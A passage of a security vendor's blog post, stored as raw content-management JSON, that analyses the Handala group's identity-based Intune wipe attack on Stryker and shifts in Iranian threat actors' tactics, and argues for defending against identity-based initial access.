TTP",[15424],{"type":370},{},{"nodeType":1657,"data":15427,"content":15428},{},[15429,15439,15449],{"nodeType":1687,"data":15430,"content":15431},{},[15432],{"nodeType":178,"data":15433,"content":15434},{},[15435],{"nodeType":173,"value":15436,"marks":15437,"data":15438},"Initial access",[],{},{"nodeType":1687,"data":15440,"content":15441},{},[15442],{"nodeType":178,"data":15443,"content":15444},{},[15445],{"nodeType":173,"value":15446,"marks":15447,"data":15448},"VPN credential brute-force, supply chain compromise of managed service providers and IT vendors, spearphishing with wiper delivery, exploitation of SharePoint and Windows server vulnerabilities",[],{},{"nodeType":1687,"data":15450,"content":15451},{},[15452],{"nodeType":178,"data":15453,"content":15454},{},[15455,15459],{"nodeType":173,"value":15456,"marks":15457,"data":15458},"I",[],{},{"nodeType":173,"value":15460,"marks":15461,"data":15462},"dentity compromise targeting Microsoft Entra ID",[],{},{"nodeType":1657,"data":15464,"content":15465},{},[15466,15476,15486],{"nodeType":1687,"data":15467,"content":15468},{},[15469],{"nodeType":178,"data":15470,"content":15471},{},[15472],{"nodeType":173,"value":15473,"marks":15474,"data":15475},"Persistence",[],{},{"nodeType":1687,"data":15477,"content":15478},{},[15479],{"nodeType":178,"data":15480,"content":15481},{},[15482],{"nodeType":173,"value":15483,"marks":15484,"data":15485},"Web shells (Karma Shell, reGeorg)",[],{},{"nodeType":1687,"data":15487,"content":15488},{},[15489],{"nodeType":178,"data":15490,"content":15491},{},[15492],{"nodeType":173,"value":15493,"marks":15494,"data":15495},"Global Administrator access to cloud tenant, no persistence mechanism needed",[],{},{"nodeType":1657,"data":15497,"content":15498},{},[15499,15509,15519],{"nodeType":1687,"data":15500,"content":15501},{},[15502],{"nodeType":178,"data":15503,"content":15504},{},[15505],{"nodeType":173,"value":15506,"marks":15507,"data":15508},"Lateral movement",[],{},{"nodeType":1687,"data":15510,"content":15511},{},[15512],{"nodeType":178,"data":15513,"content":15514},{},[15515],{"nodeType":173,"value":15516,"marks":15517,"data":15518},"RDP, SMB, FTP, Mimikatz",[],{},{"nodeType":1687,"data":15520,"content":15521},{},[15522],{"nodeType":178,"data":15523,"content":15524},{},[15525],{"nodeType":173,"value":15526,"marks":15527,"data":15528},"None required, Intune console provides global reach from a single session",[],{},{"nodeType":1657,"data":15530,"content":15531},{},[15532,15542,15552],{"nodeType":1687,"data":15533,"content":15534},{},[15535],{"nodeType":178,"data":15536,"content":15537},{},[15538],{"nodeType":173,"value":15539,"marks":15540,"data":15541},"Impact",[],{},{"nodeType":1687,"data":15543,"content":15544},{},[15545],{"nodeType":178,"data":15546,"content":15547},{},[15548],{"nodeType":173,"value":15549,"marks":15550,"data":15551},"Custom wiper malware (BiBi, Cl Wiper, No-Justice, Hatef)",[],{},{"nodeType":1687,"data":15553,"content":15554},{},[15555],{"nodeType":178,"data":15556,"content":15557},{},[15558],{"nodeType":173,"value":15559,"marks":15560,"data":15561},"Microsoft Intune Remote Wipe, a legitimate built-in administrative feature",[],{},{"nodeType":178,"data":15563,"content":15564},{},[15565],{"nodeType":173,"value":15566,"marks":15567,"data":15568},"An organisation with detections built around malware signatures, file system manipulation, and anomalous process execution would be unprepared for an attack with zero malware artifacts, where every action was a legitimate administrative command.",[],{},{"nodeType":178,"data":15570,"content":15571},{},[15572],{"nodeType":173,"value":15573,"marks":15574,"data":15575},"But while the methods were different, the core objective — mass destruction of data — is entirely consistent with previous campaigns, just through a legitimate management plane rather than custom malware.",[],{},{"nodeType":231,"data":15577,"content":15578},{},[],{"nodeType":169,"data":15580,"content":15581},{},[15582],{"nodeType":173,"value":15583,"marks":15584,"data":15586},"The kill chain looks different now",[15585],{"type":370},{},{"nodeType":178,"data":15588,"content":15589},{},[15590],{"nodeType":173,"value":15591,"marks":15592,"data":15593},"The attack path was devastatingly simple. It didn't require lateral movement because there was nothing to move laterally through. It didn't require privilege escalation because they directly compromised a global administrator account. Every device managed by Intune was already within reach.",[],{},{"nodeType":178,"data":15595,"content":15596},{},[15597],{"nodeType":173,"value":15598,"marks":15599,"data":15600},"The traditional network-centric kill chain collapses into: compromise identity, access management plane, execute objective.",[],{},{"nodeType":178,"data":15602,"content":15603},{},[15604],{"nodeType":173,"value":15605,"marks":15606,"data":15607},"This is not specific to Iran-aligned actors. Russian groups are leveraging AITM phishing kits and abusing Microsoft 365 OAuth tokens via consent attacks. Scattered Spider built an operational model around social engineering and SSO account takeover. And now Handala has demonstrated that a nation-state destructive operation can be executed entirely by abusing legitimate enterprise tooling.",[],{},{"nodeType":178,"data":15609,"content":15610},{},[15611],{"nodeType":173,"value":15612,"marks":15613,"data":15614},"This kind of attack is more direct, faster to execute, and carries a significantly lower barrier to entry. You don't need custom malware and exploit development when you can log in using as-a-Service kits or partner with an access brokering specialist.",[],{},{"nodeType":231,"data":15616,"content":15617},{},[],{"nodeType":169,"data":15619,"content":15620},{},[15621],{"nodeType":173,"value":15622,"marks":15623,"data":15625},"The big picture of Iranian cyber TTPs",[15624],{"type":370},{},{"nodeType":178,"data":15627,"content":15628},{},[15629,15633,15641],{"nodeType":173,"value":15630,"marks":15631,"data":15632},"Iran's offensive cyber capability is split between two rival intelligence bureaucracies. The Ministry of Intelligence and Security (MOIS) runs groups like APT34, MuddyWater, Scarred Manticore, and Void Manticore (Handala), which tend toward long-dwell espionage and coordinated destructive operations, often using a ",[],{},{"nodeType":186,"data":15634,"content":15636},{"uri":15635},"https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/",[15637],{"nodeType":173,"value":15638,"marks":15639,"data":15640},"documented dual-actor handoff model",[],{},{"nodeType":173,"value":15642,"marks":15643,"data":15644}," where Scarred Manticore conducts stealthy espionage before handing targets to Void Manticore (Handala) for destruction.",[],{},{"nodeType":178,"data":15646,"content":15647},{},[15648],{"nodeType":173,"value":15649,"marks":15650,"data":15651},"The Islamic Revolutionary Guard Corps (IRGC) runs a wider set of groups, including APT33/Peach Sandstorm, APT35/Charming Kitten, APT42, Tortoiseshell/Imperial Kitten, Cotton Sandstorm, and CyberAv3ngers. IRGC groups cover espionage, destructive attacks, influence operations, election interference, ICS targeting across U.S. water and wastewater facilities), and individual surveillance.",[],{},{"nodeType":235,"data":15653,"content":15654},{},[15655],{"nodeType":173,"value":15656,"marks":15657,"data":15659},"IRGC groups have already shifted to identity-first TTPs",[15658],{"type":370},{},{"nodeType":178,"data":15661,"content":15662},{},[15663],{"nodeType":173,"value":15664,"marks":15665,"data":15666},"On the IRGC side, the shift toward identity-centric operations is well-documented:",[],{},{"nodeType":250,"data":15668,"content":15669},{},[15670,15721,15759,15786],{"nodeType":254,"data":15671,"content":15672},{},[15673],{"nodeType":178,"data":15674,"content":15675},{},[15676,15681,15685,15693,15697,15705,15709,15717],{"nodeType":173,"value":15677,"marks":15678,"data":15680},"APT33/Peach Sandstorm",[15679],{"type":370},{},{"nodeType":173,"value":15682,"marks":15683,"data":15684}," shifted decisively toward credential-based initial access starting in early 2023, with Microsoft ",[],{},{"nodeType":186,"data":15686,"content":15688},{"uri":15687},"https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/",[15689],{"nodeType":173,"value":15690,"marks":15691,"data":15692},"documenting",[],{},{"nodeType":173,"value":15694,"marks":15695,"data":15696}," large-scale password spray campaigns targeting thousands of organisations, ",[],{},{"nodeType":186,"data":15698,"content":15700},{"uri":15699},"https://www.bleepingcomputer.com/news/security/iranian-hackers-breach-defense-orgs-in-password-spray-attacks/",[15701],{"nodeType":173,"value":15702,"marks":15703,"data":15704},"Golden SAML",[],{},{"nodeType":173,"value":15706,"marks":15707,"data":15708}," attacks for persistent cloud access, and the use of ",[],{},{"nodeType":186,"data":15710,"content":15712},{"uri":15711},"https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-deploys-new-custom-tickler-malware-in-long-running-intelligence-gathering-operations/",[15713],{"nodeType":173,"value":15714,"marks":15715,"data":15716},"fraudulent Azure subscriptions",[],{},{"nodeType":173,"value":15718,"marks":15719,"data":15720}," for C2 infrastructure.",[],{},{"nodeType":254,"data":15722,"content":15723},{},[15724],{"nodeType":178,"data":15725,"content":15726},{},[15727,15732,15735,15743,15747,15755],{"nodeType":173,"value":15728,"marks":15729,"data":15731},"APT42",[15730],{"type":370},{},{"nodeType":173,"value":2936,"marks":15733,"data":15734},[],{},{"nodeType":186,"data":15736,"content":15738},{"uri":15737},"https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations",[15739],{"nodeType":173,"value":15740,"marks":15741,"data":15742},"assessed by Mandiant to operate on behalf of the IRGC-IO, ",[],{},{"nodeType":173,"value":15744,"marks":15745,"data":15746},"has made credential harvesting and MFA bypass its core competency, operating almost entirely within cloud environments post-compromise and ",[],{},{"nodeType":186,"data":15748,"content":15750},{"uri":15749},"https://cloud.google.com/blog/topics/threat-intelligence/apt42-charms-cons-compromises",[15751],{"nodeType":173,"value":15752,"marks":15753,"data":15754},"registering its own Microsoft Authenticator",[],{},{"nodeType":173,"value":15756,"marks":15757,"data":15758}," on compromised accounts for persistent access.",[],{},{"nodeType":254,"data":15760,"content":15761},{},[15762],{"nodeType":178,"data":15763,"content":15764},{},[15765,15770,15774,15782],{"nodeType":173,"value":15766,"marks":15767,"data":15769},"APT35",[15768],{"type":370},{},{"nodeType":173,"value":15771,"marks":15772,"data":15773}," (aka Imperial Kitten/Tortoiseshell) was observed ",[],{},{"nodeType":186,"data":15775,"content":15777},{"uri":15776},"https://www.crowdstrike.com/explore/2026-global-threat-report?utm_medium=org",[15778],{"nodeType":173,"value":15779,"marks":15780,"data":15781},"targeting cloud identities in November 2025",[],{},{"nodeType":173,"value":15783,"marks":15784,"data":15785},", deploying the Evilginx2 AitM toolkit against Microsoft 365 users in Israel.",[],{},{"nodeType":254,"data":15787,"content":15788},{},[15789],{"nodeType":178,"data":15790,"content":15791},{},[15792,15797,15801,15808],{"nodeType":173,"value":15793,"marks":15794,"data":15796},"CrustyKrill",[15795],{"type":370},{},{"nodeType":173,"value":15798,"marks":15799,"data":15800}," (TA455/Smoke Sandstorm) ",[],{},{"nodeType":186,"data":15802,"content":15803},{"uri":15776},[15804],{"nodeType":173,"value":15805,"marks":15806,"data":15807},"uses fake Google Meet and Microsoft Teams pages",[],{},{"nodeType":173,"value":15809,"marks":15810,"data":15811}," with a live operator intercepting 2FA codes in real time, alongside Azure Web Apps for C2.",[],{},{"nodeType":178,"data":15813,"content":15814},{},[15815,15819,15827],{"nodeType":173,"value":15816,"marks":15817,"data":15818},"A ",[],{},{"nodeType":186,"data":15820,"content":15822},{"uri":15821},"https://media.defense.gov/2024/Oct/16/2003565317/-1/-1/0/CSA-IRAN-CYBER-BRUTE-FORCE-CRITICAL-INFRASTRUCTURE-ORGS.PDF",[15823],{"nodeType":173,"value":15824,"marks":15825,"data":15826},"joint advisory from six nations",[],{},{"nodeType":173,"value":15828,"marks":15829,"data":15830}," (FBI, CISA, NSA, CSE, AFP, ASD, advisory AA24-290A, October 2024) confirmed the pattern at the government level, documenting Iranian actors using brute force, password spraying, and MFA push bombing to compromise critical infrastructure accounts since October 2023, and assessing that the actors sell this access on cybercriminal forums.",[],{},{"nodeType":235,"data":15832,"content":15833},{},[15834],{"nodeType":173,"value":15835,"marks":15836,"data":15838},"MOIS groups are changing their approach too",[15837],{"type":370},{},{"nodeType":178,"data":15840,"content":15841},{},[15842],{"nodeType":173,"value":15843,"marks":15844,"data":15845},"On the MOIS side, the documented TTP baseline has historically centred on custom malware, network-level persistence, and exploitation of on-premises infrastructure. But identity compromise, particularly credential theft, has been a consistent thread across broader MOIS groups too:",[],{},{"nodeType":250,"data":15847,"content":15848},{},[15849,15888,15915,15966],{"nodeType":254,"data":15850,"content":15851},{},[15852],{"nodeType":178,"data":15853,"content":15854},{},[15855,15860,15864,15872,15876,15884],{"nodeType":173,"value":15856,"marks":15857,"data":15859},"APT34 (OilRig) ",[15858],{"type":370},{},{"nodeType":173,"value":15861,"marks":15862,"data":15863},"built its reputation on DNS tunnelling and custom backdoors, but its initial access methods include spearphishing and fake VPN portals for credential harvesting. Its 2024 campaigns introduced ",[],{},{"nodeType":186,"data":15865,"content":15867},{"uri":15866},"https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks.html",[15868],{"nodeType":173,"value":15869,"marks":15870,"data":15871},"password filter DLLs",[],{},{"nodeType":173,"value":15873,"marks":15874,"data":15875}," registered at the domain controller level to intercept plaintext credentials during password change events, with the ",[],{},{"nodeType":186,"data":15877,"content":15879},{"uri":15878},"https://www.bleepingcomputer.com/news/security/oilrig-hackers-now-exploit-windows-flaw-to-elevate-privileges/",[15880],{"nodeType":173,"value":15881,"marks":15882,"data":15883},"STEALHOOK backdoor",[],{},{"nodeType":173,"value":15885,"marks":15886,"data":15887}," exfiltrating stolen domain credentials via compromised Exchange servers. Cloud-based downloaders leveraging OneDrive and Microsoft Graph API were active against Israeli targets from 2022 to 2024.",[],{},{"nodeType":254,"data":15889,"content":15890},{},[15891],{"nodeType":178,"data":15892,"content":15893},{},[15894,15899,15903,15911],{"nodeType":173,"value":15895,"marks":15896,"data":15898},"APT39 (Chafer) ",[15897],{"type":370},{},{"nodeType":173,"value":15900,"marks":15901,"data":15902},"operated through the ",[],{},{"nodeType":186,"data":15904,"content":15906},{"uri":15905},"https://home.treasury.gov/news/press-releases/sm1127",[15907],{"nodeType":173,"value":15908,"marks":15909,"data":15910},"sanctioned front company Rana Intelligence Computing",[],{},{"nodeType":173,"value":15912,"marks":15913,"data":15914},", focuses on surveillance and tracking of individuals, using credential harvesting through spoofed airline and telecom domains across 30+ countries.",[],{},{"nodeType":254,"data":15916,"content":15917},{},[15918],{"nodeType":178,"data":15919,"content":15920},{},[15921,15926,15930,15938,15942,15950,15954,15962],{"nodeType":173,"value":15922,"marks":15923,"data":15925},"MuddyWater",[15924],{"type":370},{},{"nodeType":173,"value":15927,"marks":15928,"data":15929},", confirmed by a ",[],{},{"nodeType":186,"data":15931,"content":15933},{"uri":15932},"https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-055a",[15934],{"nodeType":173,"value":15935,"marks":15936,"data":15937},"joint CISA/FBI/NSA/NCSC advisory",[],{},{"nodeType":173,"value":15939,"marks":15940,"data":15941}," as a subordinate element of MOIS, functions as an initial access broker within the ecosystem. Its operations rely on spearphishing and abuse of legitimate RMM tools, but the group has developed ",[],{},{"nodeType":186,"data":15943,"content":15945},{"uri":15944},"https://thehackernews.com/2025/12/iran-linked-hackers-hits-israeli_2.html",[15946],{"nodeType":173,"value":15947,"marks":15948,"data":15949},"dedicated credential stealers",[],{},{"nodeType":173,"value":15951,"marks":15952,"data":15953}," including CE-Notes (which bypasses Chrome's app-bound encryption), Blub (a multi-browser credential extractor), and LP-Notes (fake Windows Security dialogs to capture system credentials). A parallel campaign documented by ",[],{},{"nodeType":186,"data":15955,"content":15957},{"uri":15956},"https://www.group-ib.com/blog/muddywater-espionage/",[15958],{"nodeType":173,"value":15959,"marks":15960,"data":15961},"Group-IB",[],{},{"nodeType":173,"value":15963,"marks":15964,"data":15965}," found the group deploying a custom Chromium credential stealer alongside its Phoenix backdoor.",[],{},{"nodeType":254,"data":15967,"content":15968},{},[15969],{"nodeType":178,"data":15970,"content":15971},{},[15972,15977],{"nodeType":173,"value":15973,"marks":15974,"data":15976},"Lyceum (Hexane)",[15975],{"type":370},{},{"nodeType":173,"value":15978,"marks":15979,"data":15980}," overlaps operationally with APT34 and uses password spraying and brute-force attacks for initial access, and notably probed Albanian government infrastructure ahead of Handala destructive attacks in 2022, illustrating the collaborative model across MOIS groups.",[],{},{"nodeType":178,"data":15982,"content":15983},{},[15984,15988,15996],{"nodeType":173,"value":15985,"marks":15986,"data":15987},"Check Point has also ",[],{},{"nodeType":186,"data":15989,"content":15991},{"uri":15990},"https://research.checkpoint.com/2026/iranian-mois-actors-the-cyber-crime-connection/",[15992],{"nodeType":173,"value":15993,"marks":15994,"data":15995},"documented",[],{},{"nodeType":173,"value":15997,"marks":15998,"data":15999}," a broader pattern of MOIS actors engaging directly with the criminal ecosystem, including Handala's adoption of the Rhadamanthys commercial infostealer and Iranian-affiliated operators working through the Qilin ransomware-as-a-service infrastructure.",[],{},{"nodeType":312,"data":16001,"content":16005},{"target":16002},{"sys":16003},{"id":16004,"type":317,"linkType":318},"2SFtROFuPZ4SPTL87Vpjr9",[],{"nodeType":231,"data":16007,"content":16008},{},[],{"nodeType":169,"data":16010,"content":16011},{},[16012],{"nodeType":173,"value":16013,"marks":16014,"data":16016},"The problem with over-indexing on TTPs",[16015],{"type":370},{},{"nodeType":178,"data":16018,"content":16019},{},[16020],{"nodeType":173,"value":16021,"marks":16022,"data":16023},"Threat intelligence has real value. Attributing campaigns to named groups, mapping their techniques to MITRE ATT&CK, and generating detection rules gives defenders a meaningful starting point. The problem is treating a specific actor's historical TTP catalogue as the primary basis for detection logic, rather than combining it with the broader trends in attacker behaviour visible across the entire landscape.",[],{},{"nodeType":178,"data":16025,"content":16026},{},[16027],{"nodeType":173,"value":16028,"marks":16029,"data":16030},"Operators are creative and pragmatic. If the path of least resistance is a compromised admin credential and a legitimate MDM feature, no serious attacker is going to deploy custom wiper malware instead because that's what they used last time.",[],{},{"nodeType":178,"data":16032,"content":16033},{},[16034],{"nodeType":173,"value":16035,"marks":16036,"data":16037},"If your threat model says you're a plausible target for an Iranian threat group, and the trend data tells you that identity compromise is the most common initial access method across all actors, the rational response is to evaluate your controls aligned to identity-based initial access, not just deploy signatures for BiBi Wiper. When the specific actor profile crowds out the general trend data, you end up building defences against the last attack and leaving yourself exposed to the shift that every actor is going through.",[],{},{"nodeType":231,"data":16039,"content":16040},{},[],{"nodeType":169,"data":16042,"content":16043},{},[16044],{"nodeType":173,"value":16045,"marks":16046,"data":16048},"Evaluating the security guidance",[16047],{"type":370},{},{"nodeType":178,"data":16050,"content":16051},{},[16052,16056,16064,16068,16076,16080,16085],{"nodeType":173,"value":16053,"marks":16054,"data":16055},"In the wake of the breach, industry guidance has settled around enforcing phishing-resistant MFA on privileged accounts, implementing just-in-time privilege activation via ",[],{},{"nodeType":186,"data":16057,"content":16059},{"uri":16058},"https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-configure",[16060],{"nodeType":173,"value":16061,"marks":16062,"data":16063},"PIM",[],{},{"nodeType":173,"value":16065,"marks":16066,"data":16067},", enabling ",[],{},{"nodeType":186,"data":16069,"content":16071},{"uri":16070},"https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/multi-admin-approval",[16072],{"nodeType":173,"value":16073,"marks":16074,"data":16075},"Multi Admin Approval ",[],{},{"nodeType":173,"value":16077,"marks":16078,"data":16079},"for high-risk Intune operations, configuring anomaly alerting on bulk device actions, and segregating administrative identities from everyday user accounts. This is all sound advice, but these recommendations are designed to limit what an attacker can do ",[],{},{"nodeType":173,"value":16081,"marks":16082,"data":16084},"after",[16083],{"type":1646},{},{"nodeType":173,"value":16086,"marks":16087,"data":16088}," an account has already been compromised — introducing friction, but not blocking them entirely.",[],{},{"nodeType":178,"data":16090,"content":16091},{},[16092,16096,16104,16108,16116],{"nodeType":173,"value":16093,"marks":16094,"data":16095},"The detection challenges compound this. Entra ID sign-in logs and ",[],{},{"nodeType":186,"data":16097,"content":16099},{"uri":16098},"https://www.a6n.co.uk/2025/11/tracking-device-wipes-in-microsoft.html",[16100],{"nodeType":173,"value":16101,"marks":16102,"data":16103},"Intune audit logs exist in separate systems",[],{},{"nodeType":173,"value":16105,"marks":16106,"data":16107}," with separate correlation IDs. Tracing a sign-in to a subsequent device action requires deliberate log integration that many organisations haven't implemented. The ",[],{},{"nodeType":186,"data":16109,"content":16111},{"uri":16110},"https://learn.microsoft.com/en-us/intune/intune-service/fundamentals/monitor-audit-logs",[16112],{"nodeType":173,"value":16113,"marks":16114,"data":16115},"logs do record",[],{},{"nodeType":173,"value":16117,"marks":16118,"data":16119}," \"wipe ManagedDevice\" events, but may not be linked to real-time alerting. And the underlying action, Intune's Remote Wipe, is a legitimate feature used routinely in enterprise IT. Again, the attack could have succeeded even with these in place.",[],{},{"nodeType":178,"data":16121,"content":16122},{},[16123],{"nodeType":173,"value":16124,"marks":16125,"data":16126},"In a world where a compromised account can be rapidly exploited, it's vital to focus on improving detection and prevention as early as possible in the kill chain — combating initial access techniques themselves.",[],{},{"nodeType":312,"data":16128,"content":16131},{"target":16129},{"sys":16130},{"id":14931,"type":317,"linkType":318},[],{"nodeType":231,"data":16133,"content":16134},{},[],{"nodeType":169,"data":16136,"content":16137},{},[16138],{"nodeType":173,"value":16139,"marks":16140,"data":16142},"Closing thoughts",[16141],{"type":370},{},{"nodeType":178,"data":16144,"content":16145},{},[16146],{"nodeType":173,"value":16147,"marks":16148,"data":16149},"The Stryker attack reflects what attackers everywhere — from financially motivated criminal groups to more destructive nation-state operators — are already doing. Identity-based initial access, abuse of legitimate tools and services, and living-off-the-land execution are the current standard operating procedure.",[],{},{"nodeType":178,"data":16151,"content":16152},{},[16153],{"nodeType":173,"value":16154,"marks":16155,"data":16156},"Even with a perfectly hardened environment, most public breaches today involve attackers hijacking SSO mechanisms to move into connected applications, exfiltrating data for resale or extortion, and in some cases leveraging cloud services and admin platforms to deploy ransomware (the Scattered Spider playbook of dropping ransomware via VMware management portal being a well-documented example).",[],{},{"nodeType":178,"data":16158,"content":16159},{},[16160],{"nodeType":173,"value":16161,"marks":16162,"data":16163},"The majority of attackers will have no interest in destructively wiping an Intune environment — that's difficult to monetize. But the techniques that enabled the Stryker wipe are the same as those that enable financially motivated breaches at scale, pointing to a challenge that extends well beyond Iran-nexus threat actors and MDM hardening.",[],{},{"nodeType":231,"data":16165,"content":16166},{},[],{"nodeType":169,"data":16168,"content":16169},{},[16170],{"nodeType":173,"value":15112,"marks":16171,"data":16173},[16172],{"type":370},{},{"nodeType":178,"data":16175,"content":16176},{},[16177],{"nodeType":173,"value":16178,"marks":16179,"data":16180},"Push Security's browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":16182,"content":16183},{},[16184,16187,16193,16196,16202,16205,16211],{"nodeType":173,"value":1451,"marks":16185,"data":16186},[],{},{"nodeType":186,"data":16188,"content":16189},{"uri":1456},[16190],{"nodeType":173,"value":1459,"marks":16191,"data":16192},[],{},{"nodeType":173,"value":2936,"marks":16194,"data":16195},[],{},{"nodeType":186,"data":16197,"content":16198},{"uri":3941},[16199],{"nodeType":173,"value":5287,"marks":16200,"data":16201},[],{},{"nodeType":173,"value":3949,"marks":16203,"data":16204},[],{},{"nodeType":186,"data":16206,"content":16207},{"uri":1469},[16208],{"nodeType":173,"value":1472,"marks":16209,"data":16210},[],{},{"nodeType":173,"value":1477,"marks":16212,"data":16213},[],{},{"entries":16215},{"hyperlink":16216,"inline":16217,"block":16218},[],[],[16219,16233,16251],{"sys":16220,"__typename":5311,"content":16221,"name":16232,"title":118},{"id":15323},{"json":16222},{"nodeType":165,"data":16223,"content":16224},{},[16225],{"nodeType":178,"data":16226,"content":16227},{},[16228],{"nodeType":173,"value":16229,"marks":16230,"data":16231},"Handala is a public-facing \"faketivist\" persona, also known as Handala Hack Team, Void Manticore, Storm-0842, Dune, Red Sandstorm, and Banished Kitten. The group also operates under regional personas like Karma and Homeland Justice. We'll refer to them as Handala in this piece.",[],{},"Handala blog insight box 1",{"sys":16234,"__typename":5311,"content":16235,"name":16250,"title":118},{"id":16004},{"json":16236},{"nodeType":165,"data":16237,"content":16238},{},[16239],{"nodeType":178,"data":16240,"content":16241},{},[16242,16246],{"nodeType":173,"value":16243,"marks":16244,"data":16245},"So, t",[],{},{"nodeType":173,"value":16247,"marks":16248,"data":16249},"he Stryker attack path is operationally consistent with the direction the Iranian threat ecosystem has been moving, even though it departs from Handala's own documented TTPs. Many of Handala's previous methods — targeting managed service providers and IT vendors, malware spearphishing, VPN credential stuffing — can also be repurposed in identity-focused social engineering attacks, particularly when boosted with widely available tools already powering criminal campaigns.",[],{},"Handala blog insight box 3",{"sys":16252,"__typename":15269,"type":15270,"ctaText":15271,"buttonLabel":15272,"buttonColour":15273,"buttonUrl":66},{"id":14931},{"items":16254},[16255,17083,17831],{"__typename":1528,"sys":16256,"content":16257,"title":1480,"synopsis":1481,"hashTags":118,"publishedDate":1482,"slug":1483,"tagsCollection":17073,"authorsCollection":17079},{"id":519},{"json":16258},{"nodeType":165,"data":16259,"content":16260},{},[16261,16267,16273,16279,16282,16289,16295,16301,16306,16312,16317,16333,16339,16349,16352,16359,16365,16378,16384,16394,16399,16402,16409,16416,16421,16429,16445,16453,16459,16467,16482,16490,16496,16504,16530,16538,16544,16552,16568,16573,16581,16587,16595,16628,16631,16638,16646,16662,16670,16676,16684,16710,16715,16723,16729,16734,16737,16744,16752,16758,16809,16814,16817,16824,16832,16838,16843,16846,16853,16859,16865,16925,16931,16986,16992,16995,17002,17008,17014,17019,17022,17029,17035,17041,17047],{"nodeType":178,"data":16262,"content":16263},{},[16264],{"nodeType":173,"value":528,"marks":16265,"data":16266},[],{},{"nodeType":178,"data":16268,"content":16269},{},[16270],{"nodeType":173,"value":535,"marks":16271,"data":16272},[],{},{"nodeType":178,"data":16274,"content":16275},{},[16276],{"nodeType":173,"value":542,"marks":16277,"data":16278},[],{},{"nodeType":231,"data":16280,"content":16281},{},[],{"nodeType":169,"data":16283,"content":16284},{},[16285],{"nodeType":173,"value":552,"marks":16286,"data":16288},[16287],{"type":370},{},{"nodeType":178,"data":16290,"content":16291},{},[16292],{"nodeType":173,"value":560,"marks":16293,"data":16294},[],{},{"nodeType":178,"data":16296,"content":16297},{},[16298],{"nodeType":173,"value":567,"marks":16299,"data":16300},[],{},{"nodeType":312,"data":16302,"content":16305},{"target":16303},{"sys":16304},{"id":574,"type":317,"linkType":318},[],{"nodeType":178,"data":16307,"content":16308},{},[16309],{"nodeType":173,"value":580,"marks":16310,"data":16311},[],{},{"nodeType":312,"data":16313,"content":16316},{"target":16314},{"sys":16315},{"id":587,"type":317,"linkType":318},[],{"nodeType":178,"data":16318,"content":16319},{},[16320,16323,16330],{"nodeType":173,"value":593,"marks":16321,"data":16322},[],{},{"nodeType":186,"data":16324,"content":16325},{"uri":598},[16326],{"nodeType":173,"value":601,"marks":16327,"data":16329},[16328],{"type":194},{},{"nodeType":173,"value":606,"marks":16331,"data":16332},[],{},{"nodeType":178,"data":16334,"content":16335},{},[16336],{"nodeType":173,"value":613,"marks":16337,"data":16338},[],{},{"nodeType":178,"data":16340,"content":16341},{},[16342,16345],{"nodeType":173,"value":620,"marks":16343,"data":16344},[],{},{"nodeType":173,"value":624,"marks":16346,"data":16348},[16347],{"type":370},{},{"nodeType":231,"data":16350,"content":16351},{},[],{"nodeType":169,"data":16353,"content":16354},{},[16355],{"nodeType":173,"value":635,"marks":16356,"data":16358},[16357],{"type":370},{},{"nodeType":178,"data":16360,"content":16361},{},[16362],{"nodeType":173,"value":643,"marks":16363,"data":16364},[],{},{"nodeType":178,"data":16366,"content":16367},{},[16368,16371,16375],{"nodeType":173,"value":650,"marks":16369,"data":16370},[],{},{"nodeType":173,"value":654,"marks":16372,"data":16374},[16373],{"type":370},{},{"nodeType":173,"value":659,"marks":16376,"data":16377},[],{},{"nodeType":178,"data":16379,"content":16380},{},[16381],{"nodeType":173,"value":666,"marks":16382,"data":16383},[],{},{"nodeType":178,"data":16385,"content":16386},{},[16387,16390],{"nodeType":173,"value":673,"marks":16388,"data":16389},[],{},{"nodeType":173,"value":677,"marks":16391,"data":16393},[16392],{"type":370},{},{"nodeType":312,"data":16395,"content":16398},{"target":16396},{"sys":16397},{"id":685,"type":317,"linkType":318},[],{"nodeType":231,"data":16400,"content":16401},{},[],{"nodeType":169,"data":16403,"content":16404},{},[16405],{"nodeType":173,"value":694,"marks":16406,"data":16408},[16407],{"type":370},{},{"nodeType":235,"data":16410,"content":16411},{},[16412],{"nodeType":173,"value":702,"marks":16413,"data":16415},[16414],{"type":370},{},{"nodeType":312,"data":16417,"content":16420},{"target":16418},{"sys":16419},{"id":710,"type":317,"linkType":318},[],{"nodeType":178,"data":16422,"content":16423},{},[16424],{"nodeType":173,"value":716,"marks":16425,"data":16428},[16426,16427],{"type":370},{"type":194},{},{"nodeType":178,"data":16430,"content":16431},{},[16432,16435,16442],{"nodeType":173,"value":725,"marks":16433,"data":16434},[],{},{"nodeType":186,"data":16436,"content":16437},{"uri":730},[16438],{"nodeType":173,"value":733,"marks":16439,"data":16441},[16440],{"type":194},{},{"nodeType":173,"value":738,"marks":16443,"data":16444},[],{},{"nodeType":178,"data":16446,"content":16447},{},[16448],{"nodeType":173,"value":745,"marks":16449,"data":16452},[16450,16451],{"type":370},{"type":194},{},{"nodeType":178,"data":16454,"content":16455},{},[16456],{"nodeType":173,"value":754,"marks":16457,"data":16458},[],{},{"nodeType":178,"data":16460,"content":16461},{},[16462],{"nodeType":173,"value":761,"marks":16463,"data":16466},[16464,16465],{"type":370},{"type":194},{},{"nodeType":178,"data":16468,"content":16469},{},[16470,16473,16479],{"nodeType":173,"value":770,"marks":16471,"data":16472},[],{},{"nodeType":186,"data":16474,"content":16475},{"uri":775},[16476],{"nodeType":173,"value":778,"marks":16477,"data":16478},[],{},{"nodeType":173,"value":782,"marks":16480,"data":16481},[],{},{"nodeType":178,"data":16483,"content":16484},{},[16485],{"nodeType":173,"value":789,"marks":16486,"data":16489},[16487,16488],{"type":370},